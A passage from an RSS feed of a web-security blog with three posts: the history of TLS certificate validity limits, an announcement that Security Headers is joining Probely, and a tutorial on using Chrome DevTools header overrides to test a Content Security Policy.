Encrypt]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Fri, 14 Jul 2023 09:57:35 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/validity-period.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/validity-period.png" alt="Cryptographic Agility Part 1: Server Certificates"><p>We&apos;ve encountered a lot of problems of our own making in the TLS/PKI ecosystem in recent years, and whilst we&apos;ve got better at dealing with them and even avoiding them, there&apos;s still a way to go. </p><p></p><h4 id="certificate-lifetime">Certificate Lifetime</h4><p>The focus of these blog posts will be on the maximum allowed validity period of certificates, but not just the certificates used by websites, we&apos;ll be taking a look at CA certificates too. To get started, I&apos;ll be looking at the certificates that almost all of us use, and that&apos;s the certificates we all get so we can have HTTPS on our websites!
I&apos;ll refer to them throughout as server certificates, but you may have come across them being called HTTPS certificates, SSL certificates, end-entity certificates, or one of a few other terms too!</p><p>Let&apos;s have a brief look at the history of certificates and if we roll back the clock far enough, there was a time when there wasn&apos;t a defined cap on the maximum validity period of a certificate. Before July 2012 you could go wild and it&apos;s easy to come across certificates that were issued with a validity period of 9 or even <em>10 years</em>! [<a href="https://search.censys.io/certificates/a50442b0925c7fe6423f1f832070a76d120dd1709514e5504dfa4b30cbffd509?ref=scotthelme.co.uk">1</a>][<a href="https://search.censys.io/certificates/458ecc66d7c78bc35eb4dd094d7fb4c484f27a6d5d1adb087b6d2f0afc1b14bc?ref=scotthelme.co.uk">2</a>]</p><p>Thinking about that now is absolutely mind-blowing and we&apos;ve chopped that down to just a fraction of what it used to be, and here&apos;s how we got here.</p><p></p><h4 id="60-months">60 Months</h4><p>The first time a limit was set on the validity period of a publicly-trusted certificate was in <a href="https://cabforum.org/wp-content/uploads/Baseline_Requirements_V1.pdf?ref=scotthelme.co.uk">v1.0 of the Baseline Requirements</a>. In &#xA7;9.4 of that very first document, you can find the following:</p><p></p><blockquote>Certificates issued after the Effective Date MUST have a Validity Period no greater than 60 months. </blockquote><p></p><p>With an effective date of 1st July 2012, we saw the introduction of a limit that reduced certificates to being valid for &quot;<em>only</em>&quot; 5 years... That&apos;s pretty wild, and still completely inappropriate by today&apos;s standards, but that was a reduction from the 9 or 10 years you could see back then.</p><p></p><h4 id="39-months">39 Months</h4><p>The next reduction in certificate lifetime came on 1st April 2015 in <a href="https://cabforum.org/wp-content/uploads/CAB-Forum-BR-1.3.0.pdf?ref=scotthelme.co.uk">v1.3.0 of the Baseline Requirements</a>, and that saw the following stipulation in &#xA7;6.3.2:</p><p></p><blockquote>Certificates issued after 1 April 2015 MUST have a Validity Period no greater than 39 months</blockquote><p></p><p>A step in the right direction for sure, but this was still far too long, and there are many good reasons why, a few of which I detail <a href="https://scotthelme.co.uk/why-we-need-to-do-more-to-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">here</a>.</p><p></p><h4 id="825-days">825 Days</h4><p>As time progressed, we saw the next reduction in certificate lifetime come on 1st March 2018 in <a href="https://cabforum.org/wp-content/uploads/CA-Browser-Forum-BR-1.4.4.pdf?ref=scotthelme.co.uk">v1.4.4 of the Baseline Requirements</a>, which set out in &#xA7;6.3.2:</p><p></p><blockquote>Certificates issued after 1 March 2018 MUST have a Validity Period no greater than 825 days</blockquote><p></p><p>At this stage, certificates were getting close to what has always been my recommendation of 12 months being the absolute limit, but we started to encounter some real friction from here.</p><p></p><h4 id="398-days">398 Days</h4><p>The industry tried to push through the idea of 398 day certificates before we had 825 day certificates, but the vote failed.
<a href="https://cabforum.org/2017/02/24/ballot-185-limiting-lifetime-certificates/?ref=scotthelme.co.uk">Ballot 185</a> called for 398 day certificates from 24th August 2017 and was met with widespread resistance from major CA players in the industry. The 825 day certificates vote was seen as the compromise and passed, but it was inevitable that 398 day certificates would be proposed again. </p><p>I gave <a href="https://scotthelme.co.uk/ballot-sc22-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">widespread coverage</a> to the next ballot, <a href="https://cabforum.org/2019/09/10/ballot-sc22-reduce-certificate-lifetimes-v2/?ref=scotthelme.co.uk">SC22</a>, which again proposed that certificates be reduced to 398 days in validity and again, failed. The reasons presented by those in the industry who wanted this change were all valid and they sought to resolve genuine concerns, I even covered many of them myself in &apos;<a href="https://scotthelme.co.uk/why-we-need-to-do-more-to-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">Why we need to do more to reduce certificate lifetimes</a>&apos;. Having failed twice to shorten certificates, a key player in the ecosystem was to step up and in the interests of improving security for their users and single-handedly push through this change. </p><p>It was a surprise to see Apple announce this, but their &apos;<a href="https://support.apple.com/en-gb/HT211025?ref=scotthelme.co.uk">About upcoming limits on trusted certificates</a>&apos; is short and sweet.</p><p></p><blockquote>TLS server certificates issued on or after 1 September 2020 00:00 GMT/UTC must not have a validity period greater than 398 days.</blockquote><p></p><p>Published on 11th March 2020, the announcement gave the industry 6 months of advanced warning and showed that Apple was serious about improving the health of the ecosystem. Shorter certificates were coming, and while Apple was making it happen, <a href="https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784?ref=scotthelme.co.uk">Google</a> and <a href="https://blog.mozilla.org/security/2020/07/09/reducing-tls-certificate-lifespans-to-398-days/?ref=scotthelme.co.uk">Mozilla</a> stood with them. With this change now being effectively a mandatory change, ballot SC31 &apos;<a href="https://cabforum.org/2020/07/16/ballot-sc31-browser-alignment/?ref=scotthelme.co.uk">Browser Alignment</a>&apos; solidified the 398 day validity period in the Baseline Requirements V1.7.7 &#xA7;6.3.2:</p><p></p><blockquote>Subscriber Certificates issued on or after 1 September 2020 SHOULD NOT have a Validity Period greater than 397 days and MUST NOT have a Validity Period greater than 398 days.</blockquote><p></p><h4 id="where-to-next">Where to next?</h4><p>For a long while now, I&apos;ve been eagerly awaiting the announcement of the next reduction in certificate lifetime and it hasn&apos;t yet arrived. I think the pandemic certainly didn&apos;t help, but still, I feel we&apos;re now overdue for the next step.</p><p>Keeping a close eye on things happening in the industry, I have seen a few changes that could be interpreted as an indication that another announcement is definitely coming, and they also hint at what that next step might be. 
</p><p></p><h4 id="certificate-transparency-policy">Certificate Transparency Policy</h4><p>If you aren&apos;t familiar with Certificate Transparency, I have an <a href="https://scotthelme.co.uk/certificate-transparency-an-introduction/?ref=scotthelme.co.uk">introductory blog post</a> that should help you get started. To give a TLDR; here, CT logs are public logs that contain all certificates so that the existence of any certificate can&apos;t be hidden and certificates can&apos;t be issued in secret. The number of logs a certificate must be written to depends on how long the certificate is valid for, with longer certificates needing to be written to more logs. </p><p>Both Apple and Google have had their own CT policy requirements for some time now, and they looked like this.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th style="text-align:center">Certificate Lifetime</th>
<th style="text-align:center">Number of SCTs from distinct CT Logs</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">&lt; 15 months</td>
<td style="text-align:center">2</td>
</tr>
<tr>
<td style="text-align:center">&gt;= 15 and &lt;= 27 months</td>
<td style="text-align:center">3</td>
</tr>
<tr>
<td style="text-align:center">&gt; 27 and &lt;= 39 months</td>
<td style="text-align:center">4</td>
</tr>
<tr>
<td style="text-align:center">&gt; 39 months</td>
<td style="text-align:center">5</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p></p><p>As you can see, the longer the certificate is valid for, the more logs it has to be written to. Of course, as time went by, those longer certificates simply ceased to exist and the policy became mostly redundant, so it was replaced with this.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th style="text-align:center">Certificate Lifetime</th>
<th style="text-align:center">Number of SCTs from distinct CT Logs</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">&lt;= 180 days</td>
<td style="text-align:center">2</td>
</tr>
<tr>
<td style="text-align:center">&gt; 180 days</td>
<td style="text-align:center">3</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p></p><p>Logging to CT logs creates a burden for the issuing CA and it&apos;s a burden that they&apos;re likely to want to minimise. By introducing these new requirements, both <a href="https://support.apple.com/en-gb/HT205280?ref=scotthelme.co.uk">Apple</a> and <a href="https://github.com/GoogleChrome/CertificateTransparency/blob/master/ct_policy.md?ref=scotthelme.co.uk">Google</a> are giving CAs an incentive to issue shorter certificates, and this is one of the things that first got me wondering if this was their way of hinting at what was coming next. Drawing the line at 180 days would certainly seem to fit well with our progress on shortening certificates, and this could be a good way to get CAs and subscribers (the people acquiring certificates) used to a 180-day cadence. Then, Google gave another hint.</p><p></p><h4 id="chrome-root-program">Chrome Root Program</h4><p>Much like Mozilla run their own <a href="https://wiki.mozilla.org/CA?ref=scotthelme.co.uk">Root Authority Program</a> for products like Firefox, <a href="https://blog.chromium.org/2022/09/announcing-launch-of-chrome-root-program.html?ref=scotthelme.co.uk">Google</a> do the same for Chrome, as do other major players in the industry, like <a href="https://learn.microsoft.com/en-us/security/trusted-root/program-requirements?ref=scotthelme.co.uk">Microsoft</a> and <a href="https://www.apple.com/certificateauthority/ca_program.html?ref=scotthelme.co.uk">Apple</a>, for their own clients. The Chrome Root Program, sadly not named the Chrome Root Authority Program (CRAP) as it would otherwise be, published <a href="https://www.chromium.org/Home/chromium-security/root-ca-policy/moving-forward-together/?ref=scotthelme.co.uk">Moving Forward, Together</a>, a post worth reading for many reasons, but I&apos;ll focus on just one of them here. </p><p></p><blockquote>a reduction of TLS server authentication subscriber certificate maximum validity from 398 days to 90 days</blockquote><p></p><p><em>90 days?!</em> Before we get too excited, it&apos;s worth noting that the section I quoted that text from begins with:</p><p></p><blockquote>In a future policy update or CA/Browser Forum Ballot Proposal, we intend to introduce</blockquote><p></p><p>This is Chrome laying the groundwork for the next change in certificate validity periods, but it doesn&apos;t exclude another step between where we are now and when 90 days becomes the norm. </p><p></p><h4 id="whats-the-next-reduction">What&apos;s the next reduction?</h4><p>Personally, I&apos;m torn over what the right option is for the next change, and that might come as a surprise to some given my views and the blog posts I&apos;ve published over the years!</p><p>On one hand, the answer is both easy and obvious, it should be 90-day certificates! On the other hand, trying to be a little more pragmatic, one has to wonder if the industry is quite ready for 90-day certificates...</p><p>My biggest hesitation is the low number of CAs that support ACME, the protocol that allows easy and standardised automatic renewal of certificates. I&apos;ve detailed the few that do offer <a href="https://scotthelme.co.uk/tag/free-acme-ca/?ref=scotthelme.co.uk">free certificates via ACME</a>, but at this point, I don&apos;t understand why all CAs don&apos;t support ACME, including the commercial ones.</p><p>If we&apos;re going to 90-day certificates, the process of renewal simply must be automated.
There&apos;s no way that it would be reasonable for anyone to consider renewing those certificates manually because they should be renewed every 30 days, or maybe 60 days at the absolute most. Once I think that, though, I then wonder how 180 days would make any difference... Would people renew those certificates manually? Is that still a reasonable expectation or should 180-day certificates also be renewed in an automated fashion? If that&apos;s the deciding factor then we should just go to 90-day certificates as everyone will need to automate anyway.</p><p>Another way to look at this is to chart the reductions in certificate validity over time, and then plot both 90-day and 180-day certificates as the next change. If we do that, you can see that one of these follows the trend much more nicely and seems like the more logical choice. The following graphs show the certificate validity limit in months on the Y axis and the date the change came into effect on the X axis. The graphs assume the next change will be introduced in Jan 2024.</p><p></p><p>Here is the graph with 180-day certificates.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1848" height="1050" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image.png 1848w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Here is the graph with 90-day certificates.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-1.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1848" height="1050" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-1.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-1.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-1.png 1848w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see that the trend line holds much better when the next change is to 90 days, while the 180-day change really flattens the bottom of that slope. On top of that, you can see that both 90 days and 180 days are, quite clearly, a reduction in our rate of progress over time, and that&apos;s assuming the change comes in Jan 2024! If we push this out further than that, which is almost a certainty at this point, things only start to look worse.</p><p></p><h4 id="other-considerations">Other Considerations</h4><p>The most obvious consideration for this change is the impact on subscribers, those using the certificates for HTTPS. It means more frequent renewals of certificates, more frequent deployments of certificates, and possibly implementing a whole new set of technologies and processes if you&apos;re doing manual renewal at present. There are some other considerations too though and I thought I&apos;d list them here briefly.</p><p></p><h6 id="can-cas-handle-the-load">Can CAs handle the load?</h6><p>Every certificate that is issued requires a CA to go through the issuance process and that requires the appropriate amount of infrastructure.
If we reduce certificate validity periods, then CAs will have to complete that process more frequently, even without increasing their number of customers. For a CA issuing only 10,000,000 certificates per year, they&apos;d be doing ~27,400 issuances per day at present assuming 1-year certificates. If we go to 90-day certificates, that same CA would now need to handle ~333,300 issuances per day (that&apos;s each certificate being renewed every ~30 days, in line with the cadence above), quite an increase! </p><p>Considerations on this load increase would need to be made for their HSM capabilities to do the signing operation, database activity, storage for logs, bandwidth both internally and externally, along with much more. There aren&apos;t many orgs out there that have the ability to do &gt;10x on their production load on short notice! You can read this <a href="https://letsencrypt.org/2021/02/10/200m-certs-24hrs.html?ref=scotthelme.co.uk">article from</a> Let&apos;s Encrypt on their concerns with having to reissue all of the non-expired certificates that they have, something which is a slightly different concern, but mirrors all of the same performance and infrastructure worries. If you look at the <a href="https://letsencrypt.org/stats/?ref=scotthelme.co.uk">Let&apos;s Encrypt stats</a>, however, they&apos;re comfortably issuing &gt;3,000,000 certificates <em>per day</em> without any problems, so it can be done; the CAs might just need to make some improvements.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-2.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="901" height="460" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-2.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-2.png 901w" sizes="(min-width: 720px) 720px"></figure><p></p><h6 id="can-ct-logs-handle-the-load">Can CT Logs handle the load?</h6><p>I briefly mentioned <a href="https://scotthelme.co.uk/certificate-transparency-an-introduction/?ref=scotthelme.co.uk">Certificate Transparency</a> at the start of this blog post and if you&apos;re unfamiliar with how it works, it requires that CAs log all certificates they issue to a minimum of two independently operated CT Logs. A lower lifespan on certificates of course means that more entries will need to be made into the CT Logs because more issuance events are taking place, and thus an increase in the associated costs of operating the log. This will require more bandwidth, more computational power and more storage, at a minimum, from all log operators! We&apos;ve already dealt with some quite significant increases in the load placed on CT logs and Temporal Sharding, as <a href="https://venafi.com/blog/how-temporal-sharding-helps-ease-challenge-growing-log-scale/?ref=scotthelme.co.uk">explained here by Venafi</a>, should be good enough to keep the sheer storage requirements at bay, but it doesn&apos;t solve the other concerns like bandwidth and compute power. Here are some details on the <a href="https://letsencrypt.org/2019/11/20/how-le-runs-ct-logs.html?ref=scotthelme.co.uk">Let&apos;s Encrypt CT Log</a> which are almost 4 years old and based on 1,000,000 certificates being issued per day, so imagine where we are now as Let&apos;s Encrypt are comfortably doing 3,000,000 certificates per day!</p><blockquote>We use 2x db.r5.4xlarge instances for RDS for each CT log. Each of these instances contains 8 CPU cores and 128GB of RAM.</blockquote><blockquote>We use 4x c5.2xlarge EC2 instances for the worker node pool for each CT log.
Each of these instances contains 8 CPU cores and 16GB of RAM.</blockquote><blockquote>A back of the napkin storage estimation is 1TB per 100 million entries. We expect to need to store 1 billion certificates and precertificates per annual temporal shard, for which we would need 10TB ... We decided to create a 12TB storage block per log (10TB plus some breathing room)</blockquote><p></p><p>With a global issuance rate of ~250,000 new certificates per hour, a rate that is only growing, CT Log Operators will certainly have some interesting times ahead!</p><p></p><h6 id="90-day-certificates">90-day certificates</h6><p>I&apos;ve long pointed out the need for shorter certificates, and once the process of issuance and deployment is automated, the validity period of a certificate no longer matters. All of the certificates that I use, both internally and externally, are automatically renewed and deployed, so I could renew them every 7 days if I really wanted to, and apart from changing the frequency of the renewal task, I wouldn&apos;t have to lift a single finger. The big push here isn&apos;t really about the validity period of a certificate; it&apos;s a push towards automation, and once we get that widespread, we&apos;ll be in a much better place!</p><p></p><p>If you enjoyed this blog post and would like to dive deeper into the World of TLS and PKI, why not join me on our <a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk">Practical TLS and PKI workshop</a>!</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-3.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1012" height="466" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-3.png 1012w" sizes="(min-width: 720px) 720px"></a></figure><p></p>]]></content:encoded></item><item><title><![CDATA[Security Headers is joining Probely! 🎉]]></title><description><![CDATA[<p>I&apos;m super excited to be making this announcement for a whole bunch of reasons that I&apos;ll go into in detail below, but, the headline is that Security Headers will be joining <a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a>!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/security-headers-full.svg" class="kg-image" alt loading="lazy" width="300" height="42"></figure><p></p><h4 id="the-announcement">The Announcement</h4><p>For anyone who uses the site or the API, this won&apos;</p>]]></description><link>https://scotthelme.co.uk/security-headers-is-joining-probely/</link><guid isPermaLink="false">64622ac3f0316400016ebc94</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 07 Jun 2023 14:10:59 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/06/IMG_9452.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/06/IMG_9452.png" alt="Security Headers is joining Probely! 
&#x1F389;"><p>I&apos;m super excited to be making this announcement for a whole bunch of reasons that I&apos;ll go into in detail below, but, the headline is that Security Headers will be joining <a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a>!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/security-headers-full.svg" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="300" height="42"></figure><p></p><h4 id="the-announcement">The Announcement</h4><p>For anyone who uses the site or the API, this won&apos;t change anything, but for me, this will bring positive changes that I wanted to share with everyone. </p><p><a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a> have been sponsoring Security Headers since Sep 2020(!) and are our longest standing sponsor. The relationship has worked so well because we&apos;re aligned in a few different ways. Getting a DAST scan from Probely is a logical next step after a free Security Headers scan, we&apos;re both focused on providing value within the community, they&apos;re a great bunch of technical people and I get along well with everyone I&apos;ve met there. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/probely.svg" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="150" height="32"></figure><p></p><p>If you look back at the history of sponsors on Security Headers, I&apos;ve always taken care to ensure that our sponsors are aligned with what we do, and it&apos;s never been the case that you can simply pay to be a sponsor. There had to be more to it than that, and that&apos;s why there were periods with no sponsor at all and I funded the project myself. To now take things to the next level, we&apos;ll be bringing Security Headers and Probely a little closer together!</p><p></p><h4 id="why-the-change">Why the change?</h4><p>In may ways, I can summarise this decision with &quot;it felt right&quot;. Security Headers wasn&apos;t for sale and I wasn&apos;t looking to sell it, but as we started to explore how we could work more closely together and the great things we could do, it naturally became the obvious path forward for us to join forces.</p><p>Probely will now take care of Security Headers and I will continue to provide the same input and direction for the site. Now though, instead of it being me doing this alone, I&apos;ll have a great team of people around me to work with, which will be a refreshing experience! Nothing will be taken away from Security Headers and scans will still be free, but if anything happens to me, it can and will continue!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-7.png" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="1286" height="768" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-7.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-7.png 1286w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Alongside continuing to maintain Security Headers, I&apos;ll also be joining Probely as a Strategic Advisor to contribute in a variety of ways to their product offering too. 
This is another element of working alongside great people that will be awesome, and whilst it&apos;s only a small time commitment, having a team of people around me who share the same passion is an exciting prospect.</p><p>All in all, this change won&apos;t be visible from the outside, but I wanted to be transparent and share this great news with everyone out there. From here, things will only continue to get better!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Overriding HTTP Response Headers in Chrome Dev Tools]]></title><description><![CDATA[<p>There&apos;s a new feature in Chrome Dev Tools that&apos;s going to make it easier than ever to get started with Security Headers like Content Security Policy! Let&apos;s take a look at how to override HTTP Response Headers and build a basic CSP in just</p>]]></description><link>https://scotthelme.co.uk/overriding-http-response-headers-in-chrome-dev-tools/</link><guid isPermaLink="false">644a8eeff05070003ddeccaa</guid><category><![CDATA[CSP]]></category><category><![CDATA[Report URI]]></category><category><![CDATA[chrome]]></category><category><![CDATA[Security Headers]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Thu, 04 May 2023 13:37:01 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/04/header-overrides.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/04/header-overrides.png" alt="Overriding HTTP Response Headers in Chrome Dev Tools"><p>There&apos;s a new feature in Chrome Dev Tools that&apos;s going to make it easier than ever to get started with Security Headers like Content Security Policy! Let&apos;s take a look at how to override HTTP Response Headers and build a basic CSP in just a few minutes.</p><p></p><h4 id="override-http-response-headers">Override HTTP Response Headers</h4><p>The feature that I&apos;m going to be showing here requires Chrome 113 or later; at the time of writing, I was testing it in Beta, but it&apos;s now available in stable, so check if you have an update available. </p><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/04/image-4.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="964" height="542" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/04/image-4.png 964w" sizes="(min-width: 720px) 720px"><figcaption><em><a href="https://developer.chrome.com/blog/new-in-devtools-113/?ref=scotthelme.co.uk">source</a></em></figcaption></figure><p></p><p>One of the great things about this new functionality in Dev Tools is that not only can you override the value of existing HTTP Response Headers, but you can also set entirely new HTTP Response Headers to test out what effect they will have. This is going to make testing certain Security Headers even easier, like <a href="https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/?ref=scotthelme.co.uk">Permissions Policy</a>, <a href="https://scotthelme.co.uk/coop-and-coep/?ref=scotthelme.co.uk">Cross Origin Embedder Policy and Cross Origin Opener Policy</a> and of course, <a href="https://scotthelme.co.uk/content-security-policy-an-introduction/?ref=scotthelme.co.uk">Content Security Policy</a>. 
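As a small taste of the kind of header you could trial this way, here&apos;s a minimal, illustrative Permissions-Policy that switches off a few powerful browser features; this is just an example of my own, not one taken from the screenshots below:</p><pre><code>Permissions-Policy: geolocation=(), camera=(), microphone=()
</code></pre><p>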
All of these headers do have safe modes for testing, where you can deploy them without any blocking action being taken and instead get feedback on what blocking action they would have caused, if any. That approach is great and, as I say, it makes testing them totally safe, but you still have to deploy them somehow. This may only be a single line of server config, application code or a tweak in your CDN settings somewhere, but it&apos;s a step you need to take nonetheless. Now, you can do really extensive testing of these Security Headers (and more!) from the comfort of your own browser.</p><p></p><h4 id="creating-an-override">Creating an override</h4><p>For the purposes of this demo, I&apos;m going to be using my own personal site to deploy a Content Security Policy header so I can do some easy testing. Open the site you want to work with, open Dev Tools and head to the Network tab. Once there, find the network request for the page load, click it to open the details, click Headers, and scroll to the Response Headers section. Here, you will see the new &apos;Header overrides&apos; option. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-6.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/05/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/05/image-6.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>That will prompt you to create an overrides file, so look for the banner near the top of the browser to give Chrome a location and permission to store the file. 
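Chrome stores the rules themselves in a <code>.headers</code> file in that folder; as a rough sketch, the one on my machine looks something like the below, but treat the exact structure as illustrative as it may change between Chrome versions, and the file pattern and header value here are placeholders:</p><pre><code>[
  {
    "applyTo": "index.html",
    "headers": [
      {
        "name": "Content-Security-Policy",
        "value": "default-src &apos;self&apos;"
      }
    ]
  }
]
</code></pre><p>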
Once done, it will take you to the Sources tab where you can view your overrides file and edit it to specify your override rules.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-6.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-6.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>I&apos;m going to &apos;Add override rule&apos; and then add my basic CSP header, which would typically make a real mess of the page!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-7.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-7.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-7.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-7.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We can now refresh the page and the override rule will be active, resulting in, as you&apos;d expect, almost everything on the page being blocked with the associated errors showing up in the Console.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-8.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-8.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-8.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-8.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-8.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-9.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-9.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-9.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-9.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-9.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Because the override rule is only being enforced locally on my client, this is a really safe way of seeing exactly what would happen given a particular configuration of your CSP or other Security Headers. 
What&apos;s even better is that the browser will behave exactly as it would if that header came from the server, which means all of the features of CSP are available to you, including sending reports!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/report-uri-full-2.svg" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="300" height="58"></figure><p></p><h4 id="creating-a-csp-the-easy-way">Creating a CSP the easy way</h4><p>It was 5 years ago now that we introduced the <a href="https://scotthelme.co.uk/report-uri-csp-wizard/?ref=scotthelme.co.uk">CSP Wizard</a> on Report URI. The CSP Wizard takes your CSP reports and allows you to build a policy by looking at the items that are present on your site. Looking at the <a href="https://docs.report-uri.com/setup/wizard/?ref=scotthelme.co.uk">documentation</a>, you can see that a simple CSP-Report-Only header is required.</p><p></p><pre><code>Content-Security-Policy-Report-Only: default-src &apos;none&apos;; form-action &apos;none&apos;; frame-ancestors &apos;none&apos;; report-uri https://{subdomain}.report-uri.com/r/d/csp/wizard
